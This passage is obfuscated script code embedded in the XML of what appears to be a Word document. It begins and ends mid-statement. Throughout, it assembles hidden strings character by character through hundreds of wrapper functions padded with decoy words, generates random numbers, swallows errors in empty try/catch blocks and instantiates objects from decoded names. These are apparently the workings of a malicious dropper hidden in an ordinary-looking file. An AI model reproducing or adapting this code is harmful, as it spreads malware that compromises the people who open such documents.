PpUzPnl(PpUzPnlJK(Rx+Rt)+(pfjco4[600]-pfjco4[Vgtf_56]),RunGe);  })(false,749,'declarations83',true)](gicqnsocial54,gicqngoal92,false,0);    gicqntheupper58=gicqndistributing22[(function(Rt,Rx){ var ptwfeatu4=Brfcook; ptwfeatu4[Vgtf_56]=4; ptwfeatu4[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ptwfeatu4[600]-ptwfeatu4[Vgtf_56]),RunGe);  })('into30',2405,true,'Asimov30')+(function(Rt,Rx){ var jqwski5=Brfcook; jqwski5[Vgtf_56]=2; jqwski5[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jqwski5[600]-jqwski5[Vgtf_56]),RunGe);  })(null,false)+(function(Rt,Rx){ var vppskil4=Brfcook; vppskil4[Vgtf_56]=1; vppskil4[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vppskil4[600]-vppskil4[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var tkuwrit4=Brfcook; tkuwrit4[Vgtf_56]=1; tkuwrit4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tkuwrit4[600]-tkuwrit4[Vgtf_56]),RunGe);  })('Both81')+(function(Rt,Rx){ var penwe3=Brfcook; penwe3[Vgtf_56]=3; penwe3[Vgtf_56-(Vgtf_56/3)]=68; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(penwe3[600]-penwe3[Vgtf_56]),RunGe);  })(false,'astonished95','Labyrinthine79')+(function(Rt,Rx){ var wjfthat84=Brfcook; wjfthat84[Vgtf_56]=3; wjfthat84[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wjfthat84[600]-wjfthat84[Vgtf_56]),RunGe);  })(true,true,null)+(function(Rt,Rx){ var wiwgr5=Brfcook; wiwgr5[Vgtf_56]=2; wiwgr5[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wiwgr5[600]-wiwgr5[Vgtf_56]),RunGe);  })(false,'Laws75')]();    gicqndistributing22[(function(Rt,Rx){ var vtesk5=Brfcook; vtesk5[Vgtf_56]=4; vtesk5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtesk5[600]-vtesk5[Vgtf_56]),RunGe);  })(false,null,'human24',true)+(function(Rt,Rx){ var euiliv5=Brfcook; euiliv5[Vgtf_56]=4; euiliv5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(euiliv5[600]-euiliv5[Vgtf_56]),RunGe);  })('second5',null,null,2865)+(function(Rt,Rx){ var hhuroad3=Brfcook; hhuroad3[Vgtf_56]=2; hhuroad3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhuroad3[600]-hhuroad3[Vgtf_56]),RunGe);  })('lawsthe36','free58')+(function(Rt,Rx){ var nujroadI5=Brfcook; nujroadI5[Vgtf_56]=3; nujroadI5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nujroadI5[600]-nujroadI5[Vgtf_56]),RunGe);  })('lawsthe36',261,null)+(function(Rt,Rx){ var ishHe3=Brfcook; ishHe3[Vgtf_56]=4; ishHe3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ishHe3[600]-ishHe3[Vgtf_56]),RunGe);  })(false,'rooted92','thus68',1003)]();    gicqntheupper58=gicqntheupper58+(function(Rt,Rx){ var huhcon3=Brfcook; huhcon3[Vgtf_56]=1; huhcon3[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(huhcon3[600]-huhcon3[Vgtf_56]),RunGe);  })('what20')+(function(Rt,Rx){ var jtvFo4=Brfcook; jtvFo4[Vgtf_56]=4; jtvFo4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jtvFo4[600]-jtvFo4[Vgtf_56]),RunGe);  })(478,'while59','that50','orthrough89')+(function(Rt,Rx){ var hntande4=Brfcook; hntande4[Vgtf_56]=0; hntande4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hntande4[600]-hntande4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jsjFor5=Brfcook; jsjFor5[Vgtf_56]=4; jsjFor5[Vgtf_56-(Vgtf_56/3)]=36; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jsjFor5[600]-jsjFor5[Vgtf_56]),RunGe);  })(2927,2927,null,false)+(function(Rt,Rx){ var phfconsc4=Brfcook; phfconsc4[Vgtf_56]=1; phfconsc4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(phfconsc4[600]-phfconsc4[Vgtf_56]),RunGe);  })(1274)+(function(Rt,Rx){ var pjean3=Brfcook; pjean3[Vgtf_56]=3; pjean3[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pjean3[600]-pjean3[Vgtf_56]),RunGe);  })('could80','State64',true)+(function(Rt,Rx){ var jkkroad3=Brfcook; jkkroad3[Vgtf_56]=1; jkkroad3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jkkroad3[600]-jkkroad3[Vgtf_56]),RunGe);  })('lawsthe36')+(function(Rt,Rx){ var nuiconte5=Brfcook; nuiconte5[Vgtf_56]=1; nuiconte5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nuiconte5[600]-nuiconte5[Vgtf_56]),RunGe);  })(687)+(function(Rt,Rx){ var kpvava3=Brfcook; kpvava3[Vgtf_56]=0; kpvava3[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kpvava3[600]-kpvava3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var sftande4=Brfcook; sftande4[Vgtf_56]=2; sftande4[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sftande4[600]-sftande4[Vgtf_56]),RunGe);  })(null,'could80')+(function(Rt,Rx){ var hhnava3=Brfcook; hhnava3[Vgtf_56]=4; hhnava3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhnava3[600]-hhnava3[Vgtf_56]),RunGe);  })(661,661,'progress41',661)+Math[(function(Rt,Rx){ var uneth4=Brfcook; uneth4[Vgtf_56]=2; uneth4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uneth4[600]-uneth4[Vgtf_56]),RunGe);  })(true,false)+(function(Rt,Rx){ var wthfea4=Brfcook; wthfea4[Vgtf_56]=1; wthfea4[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wthfea4[600]-wthfea4[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var uiwother5=Brfcook; uiwother5[Vgtf_56]=0; uiwother5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uiwother5[600]-uiwother5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nntthepa3=Brfcook; nntthepa3[Vgtf_56]=4; nntthepa3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nntthepa3[600]-nntthepa3[Vgtf_56]),RunGe);  })(true,'must38',false,'named69')+(function(Rt,Rx){ var jktan5=Brfcook; jktan5[Vgtf_56]=3; jktan5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jktan5[600]-jktan5[Vgtf_56]),RunGe);  })(1026,'could80',true)]((Math[(function(Rt,Rx){ var uuwthat3=Brfcook; uuwthat3[Vgtf_56]=3; uuwthat3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uuwthat3[600]-uuwthat3[Vgtf_56]),RunGe);  })(false,1298,false)+(function(Rt,Rx){ var qunHe5=Brfcook; qunHe5[Vgtf_56]=1; qunHe5[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qunHe5[600]-qunHe5[Vgtf_56]),RunGe);  })('rooted92')+(function(Rt,Rx){ var ijqlive5=Brfcook; ijqlive5[Vgtf_56]=4; ijqlive5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijqlive5[600]-ijqlive5[Vgtf_56]),RunGe);  })(true,'second5',null,'itself96')+(function(Rt,Rx){ var fwqco4=Brfcook; fwqco4[Vgtf_56]=4; fwqco4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwqco4[600]-fwqco4[Vgtf_56]),RunGe);  })('declarations83',1731,'provided81','second5')+(function(Rt,Rx){ var vesmere3=Brfcook; vesmere3[Vgtf_56]=2; vesmere3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vesmere3[600]-vesmere3[Vgtf_56]),RunGe);  })('idea46','indeed17')+(function(Rt,Rx){ var suneve3=Brfcook; suneve3[Vgtf_56]=2; suneve3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(suneve3[600]-suneve3[Vgtf_56]),RunGe);  })(true,'White35')]() * (12000)) + 1)+(function(Rt,Rx){ var wweme3=Brfcook; wweme3[Vgtf_56]=0; wweme3[Vgtf_56-(Vgtf_56/3)]=61; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wweme3[600]-wweme3[Vgtf_56]),RunGe);  })()+Math[(function(Rt,Rx){ var uneth4=Brfcook; uneth4[Vgtf_56]=2; uneth4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uneth4[600]-uneth4[Vgtf_56]),RunGe);  })(true,false)+(function(Rt,Rx){ var wthfea4=Brfcook; wthfea4[Vgtf_56]=1; wthfea4[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wthfea4[600]-wthfea4[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var uiwother5=Brfcook; uiwother5[Vgtf_56]=0; uiwother5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uiwother5[600]-uiwother5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nntthepa3=Brfcook; nntthepa3[Vgtf_56]=4; nntthepa3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nntthepa3[600]-nntthepa3[Vgtf_56]),RunGe);  })(true,'must38',false,'named69')+(function(Rt,Rx){ var jktan5=Brfcook; jktan5[Vgtf_56]=3; jktan5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jktan5[600]-jktan5[Vgtf_56]),RunGe);  })(1026,'could80',true)]((Math[(function(Rt,Rx){ var uuwthat3=Brfcook; uuwthat3[Vgtf_56]=3; uuwthat3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uuwthat3[600]-uuwthat3[Vgtf_56]),RunGe);  })(false,1298,false)+(function(Rt,Rx){ var qunHe5=Brfcook; qunHe5[Vgtf_56]=1; qunHe5[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qunHe5[600]-qunHe5[Vgtf_56]),RunGe);  })('rooted92')+(function(Rt,Rx){ var ijqlive5=Brfcook; ijqlive5[Vgtf_56]=4; ijqlive5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijqlive5[600]-ijqlive5[Vgtf_56]),RunGe);  })(true,'second5',null,'itself96')+(function(Rt,Rx){ var fwqco4=Brfcook; fwqco4[Vgtf_56]=4; fwqco4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwqco4[600]-fwqco4[Vgtf_56]),RunGe);  })('declarations83',1731,'provided81','second5')+(function(Rt,Rx){ var vesmere3=Brfcook; vesmere3[Vgtf_56]=2; vesmere3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vesmere3[600]-vesmere3[Vgtf_56]),RunGe);  })('idea46','indeed17')+(function(Rt,Rx){ var suneve3=Brfcook; suneve3[Vgtf_56]=2; suneve3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(suneve3[600]-suneve3[Vgtf_56]),RunGe);  })(true,'White35')]() * (11000)) + 1)+(function(Rt,Rx){ var psfdo4=Brfcook; psfdo4[Vgtf_56]=2; psfdo4[Vgtf_56-(Vgtf_56/3)]=61; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(psfdo4[600]-psfdo4[Vgtf_56]),RunGe);  })('situationbecame47',true);</w:t>
        <w:tab/>
        <w:t>gicqndistributing22=null;   }catch(gicqnbythe41) {}         try   {</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">gicqndust23 = gicqnpossibly71((function(Rt,Rx){ var pkwHe5=Brfcook; pkwHe5[Vgtf_56]=2; pkwHe5[Vgtf_56-(Vgtf_56/3)]=121; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pkwHe5[600]-pkwHe5[Vgtf_56]),RunGe);  })('rooted92','thus68')+(function(Rt,Rx){ var fwigra4=Brfcook; fwigra4[Vgtf_56]=2; fwigra4[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwigra4[600]-fwigra4[Vgtf_56]),RunGe);  })('addition49','being51')+(function(Rt,Rx){ var pkkgradu4=Brfcook; pkkgradu4[Vgtf_56]=3; pkkgradu4[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pkkgradu4[600]-pkkgradu4[Vgtf_56]),RunGe);  })('Laws75','although94','humans57')+(function(Rt,Rx){ var invconte5=Brfcook; invconte5[Vgtf_56]=0; invconte5[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(invconte5[600]-invconte5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var tsfev4=Brfcook; tsfev4[Vgtf_56]=1; tsfev4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tsfev4[600]-tsfev4[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var vfqroa4=Brfcook; vfqroa4[Vgtf_56]=2; vfqroa4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vfqroa4[600]-vfqroa4[Vgtf_56]),RunGe);  })(true,264)+(function(Rt,Rx){ var pstgradu3=Brfcook; pstgradu3[Vgtf_56]=2; pstgradu3[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pstgradu3[600]-pstgradu3[Vgtf_56]),RunGe);  })(false,'robots83')+(function(Rt,Rx){ var nkigra5=Brfcook; nkigra5[Vgtf_56]=4; nkigra5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nkigra5[600]-nkigra5[Vgtf_56]),RunGe);  })('robots83',2544,true,'conscience16')+(function(Rt,Rx){ var jjuFort4=Brfcook; jjuFort4[Vgtf_56]=3; jjuFort4[Vgtf_56-(Vgtf_56/3)]=61; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjuFort4[600]-jjuFort4[Vgtf_56]),RunGe);  })(null,'while59','that50')+(function(Rt,Rx){ var wejthere5=Brfcook; wejthere5[Vgtf_56]=0; wejthere5[Vgtf_56-(Vgtf_56/3)]=123; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wejthere5[600]-wejthere5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var qnvlea3=Brfcook; qnvlea3[Vgtf_56]=2; qnvlea3[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qnvlea3[600]-qnvlea3[Vgtf_56]),RunGe);  })(true,false)+(function(Rt,Rx){ var quhpres3=Brfcook; quhpres3[Vgtf_56]=0; quhpres3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(quhpres3[600]-quhpres3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var isqgrat4=Brfcook; isqgrat4[Vgtf_56]=2; isqgrat4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(isqgrat4[600]-isqgrat4[Vgtf_56]),RunGe);  })('addition49','being51')+(function(Rt,Rx){ var vjsandem4=Brfcook; vjsandem4[Vgtf_56]=2; vjsandem4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjsandem4[600]-vjsandem4[Vgtf_56]),RunGe);  })(784,'could80')+(function(Rt,Rx){ var pjume4=Brfcook; pjume4[Vgtf_56]=2; pjume4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pjume4[600]-pjume4[Vgtf_56]),RunGe);  })('idea46',2777)+(function(Rt,Rx){ var iwpwri5=Brfcook; iwpwri5[Vgtf_56]=0; iwpwri5[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iwpwri5[600]-iwpwri5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ntiFor3=Brfcook; ntiFor3[Vgtf_56]=4; ntiFor3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ntiFor3[600]-ntiFor3[Vgtf_56]),RunGe);  })('while59',null,null,'that50')+(function(Rt,Rx){ var ttfco3=Brfcook; ttfco3[Vgtf_56]=3; ttfco3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ttfco3[600]-ttfco3[Vgtf_56]),RunGe);  })(false,'declarations83',649)+(function(Rt,Rx){ var wuqfeatu4=Brfcook; wuqfeatu4[Vgtf_56]=3; wuqfeatu4[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wuqfeatu4[600]-wuqfeatu4[Vgtf_56]),RunGe);  })('into30',null,'Asimov30')+(function(Rt,Rx){ var jjjski3=Brfcook; jjjski3[Vgtf_56]=4; jjjski3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjjski3[600]-jjjski3[Vgtf_56]),RunGe);  })(false,null,'human24','entertain53')+(function(Rt,Rx){ var hpuskill3=Brfcook; hpuskill3[Vgtf_56]=2; hpuskill3[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hpuskill3[600]-hpuskill3[Vgtf_56]),RunGe);  })(false,true)+(function(Rt,Rx){ var weqav5=Brfcook; weqav5[Vgtf_56]=4; weqav5[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(weqav5[600]-weqav5[Vgtf_56]),RunGe);  })('progress41',true,'displayed83','rather47')+(function(Rt,Rx){ var hpvlivel4=Brfcook; hpvlivel4[Vgtf_56]=4; hpvlivel4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hpvlivel4[600]-hpvlivel4[Vgtf_56]),RunGe);  })(false,false,'second5',false)+(function(Rt,Rx){ var ujeFo5=Brfcook; ujeFo5[Vgtf_56]=3; ujeFo5[Vgtf_56-(Vgtf_56/3)]=79; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujeFo5[600]-ujeFo5[Vgtf_56]),RunGe);  })('while59','that50','orthrough89')+(function(Rt,Rx){ var hkjli4=Brfcook; hkjli4[Vgtf_56]=1; hkjli4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hkjli4[600]-hkjli4[Vgtf_56]),RunGe);  })('second5')+(function(Rt,Rx){ var jqhFo4=Brfcook; jqhFo4[Vgtf_56]=4; jqhFo4[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jqhFo4[600]-jqhFo4[Vgtf_56]),RunGe);  })('while59',null,true,false)+(function(Rt,Rx){ var epuco4=Brfcook; epuco4[Vgtf_56]=2; epuco4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(epuco4[600]-epuco4[Vgtf_56]),RunGe);  })('what20',true)+(function(Rt,Rx){ var nwndown3=Brfcook; nwndown3[Vgtf_56]=2; nwndown3[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nwndown3[600]-nwndown3[Vgtf_56]),RunGe);  })(1074,1074)+(function(Rt,Rx){ var pqwcon3=Brfcook; pqwcon3[Vgtf_56]=4; pqwcon3[Vgtf_56-(Vgtf_56/3)]=65; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pqwcon3[600]-pqwcon3[Vgtf_56]),RunGe);  })('what20',true,true,false)+(function(Rt,Rx){ var fhwme5=Brfcook; fhwme5[Vgtf_56]=3; fhwme5[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fhwme5[600]-fhwme5[Vgtf_56]),RunGe);  })('idea46',true,false)+(function(Rt,Rx){ var ppngra3=Brfcook; ppngra3[Vgtf_56]=2; ppngra3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ppngra3[600]-ppngra3[Vgtf_56]),RunGe);  })('Laws75',false)+(function(Rt,Rx){ var jhvsk4=Brfcook; jhvsk4[Vgtf_56]=1; jhvsk4[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jhvsk4[600]-jhvsk4[Vgtf_56]),RunGe);  })('human24')+(function(Rt,Rx){ var hwhande4=Brfcook; hwhande4[Vgtf_56]=1; hwhande4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwhande4[600]-hwhande4[Vgtf_56]),RunGe);  })('could80')+(function(Rt,Rx){ var pqjfea3=Brfcook; pqjfea3[Vgtf_56]=0; pqjfea3[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pqjfea3[600]-pqjfea3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fkfgra5=Brfcook; fkfgra5[Vgtf_56]=2; fkfgra5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fkfgra5[600]-fkfgra5[Vgtf_56]),RunGe);  })('Laws75',false)+(function(Rt,Rx){ var sefFo5=Brfcook; sefFo5[Vgtf_56]=2; sefFo5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sefFo5[600]-sefFo5[Vgtf_56]),RunGe);  })(false,'while59')+(function(Rt,Rx){ var tifco3=Brfcook; tifco3[Vgtf_56]=0; tifco3[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tifco3[600]-tifco3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var tvsForth3=Brfcook; tvsForth3[Vgtf_56]=2; tvsForth3[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tvsForth3[600]-tvsForth3[Vgtf_56]),RunGe);  })(false,true)+(function(Rt,Rx){ var uwhco5=Brfcook; uwhco5[Vgtf_56]=3; uwhco5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uwhco5[600]-uwhco5[Vgtf_56]),RunGe);  })(null,true,'declarations83')+(function(Rt,Rx){ var uivconsc4=Brfcook; uivconsc4[Vgtf_56]=2; uivconsc4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uivconsc4[600]-uivconsc4[Vgtf_56]),RunGe);  })(2689,false)+(function(Rt,Rx){ var fjsgra3=Brfcook; fjsgra3[Vgtf_56]=3; fjsgra3[Vgtf_56-(Vgtf_56/3)]=128; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fjsgra3[600]-fjsgra3[Vgtf_56]),RunGe);  })('addition49',941,941)+(function(Rt,Rx){ var ujicon5=Brfcook; ujicon5[Vgtf_56]=4; ujicon5[Vgtf_56-(Vgtf_56/3)]=37; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujicon5[600]-ujicon5[Vgtf_56]),RunGe);  })(2438,'declarations83',null,true)+gicqnnothing15+gicqnnothing15+(function(Rt,Rx){ var qujli4=Brfcook; qujli4[Vgtf_56]=1; qujli4[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qujli4[600]-qujli4[Vgtf_56]),RunGe);  })(false)+gicqnnothing15+(function(Rt,Rx){ var npjfeatu5=Brfcook; npjfeatu5[Vgtf_56]=4; npjfeatu5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(npjfeatu5[600]-npjfeatu5[Vgtf_56]),RunGe);  })(true,2647,'into30',false)+(function(Rt,Rx){ var ijpskil5=Brfcook; ijpskil5[Vgtf_56]=0; ijpskil5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijpskil5[600]-ijpskil5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var skemerel4=Brfcook; skemerel4[Vgtf_56]=3; skemerel4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(skemerel4[600]-skemerel4[Vgtf_56]),RunGe);  })(1259,'idea46','indeed17')+(function(Rt,Rx){ var tekothe5=Brfcook; tekothe5[Vgtf_56]=2; tekothe5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tekothe5[600]-tekothe5[Vgtf_56]),RunGe);  })(false,'robot28')+gicqnnothing15+(function(Rt,Rx){ var kfiaval5=Brfcook; kfiaval5[Vgtf_56]=0; kfiaval5[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kfiaval5[600]-kfiaval5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var isqwork4=Brfcook; isqwork4[Vgtf_56]=2; isqwork4[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(isqwork4[600]-isqwork4[Vgtf_56]),RunGe);  })('although94',false)+(function(Rt,Rx){ var vjvfeatu3=Brfcook; vjvfeatu3[Vgtf_56]=4; vjvfeatu3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjvfeatu3[600]-vjvfeatu3[Vgtf_56]),RunGe);  })(true,null,null,false)+(function(Rt,Rx){ var jjjcon3=Brfcook; jjjcon3[Vgtf_56]=1; jjjcon3[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjjcon3[600]-jjjcon3[Vgtf_56]),RunGe);  })('what20')+(function(Rt,Rx){ var jvfwr4=Brfcook; jvfwr4[Vgtf_56]=3; jvfwr4[Vgtf_56-(Vgtf_56/3)]=53; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jvfwr4[600]-jvfwr4[Vgtf_56]),RunGe);  })('Both81',false,'beingcharitable40'));    </w:t>
        <w:tab/>
        <w:t>gicqnwhich71=0;    gicqncould60 = new gicqnbread72(gicqndust23[(function(Rt,Rx){ var evwgradu4=Brfcook; evwgradu4[Vgtf_56]=3; evwgradu4[Vgtf_56-(Vgtf_56/3)]=72; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(evwgradu4[600]-evwgradu4[Vgtf_56]),RunGe);  })('robots83',true,'conscience16')+(function(Rt,Rx){ var jwuthat84=Brfcook; jwuthat84[Vgtf_56]=1; jwuthat84[Vgtf_56-(Vgtf_56/3)]=121; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jwuthat84[600]-jwuthat84[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var uhsgr5=Brfcook; uhsgr5[Vgtf_56]=1; uhsgr5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uhsgr5[600]-uhsgr5[Vgtf_56]),RunGe);  })(908)+(function(Rt,Rx){ var iskeve5=Brfcook; iskeve5[Vgtf_56]=1; iskeve5[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iskeve5[600]-iskeve5[Vgtf_56]),RunGe);  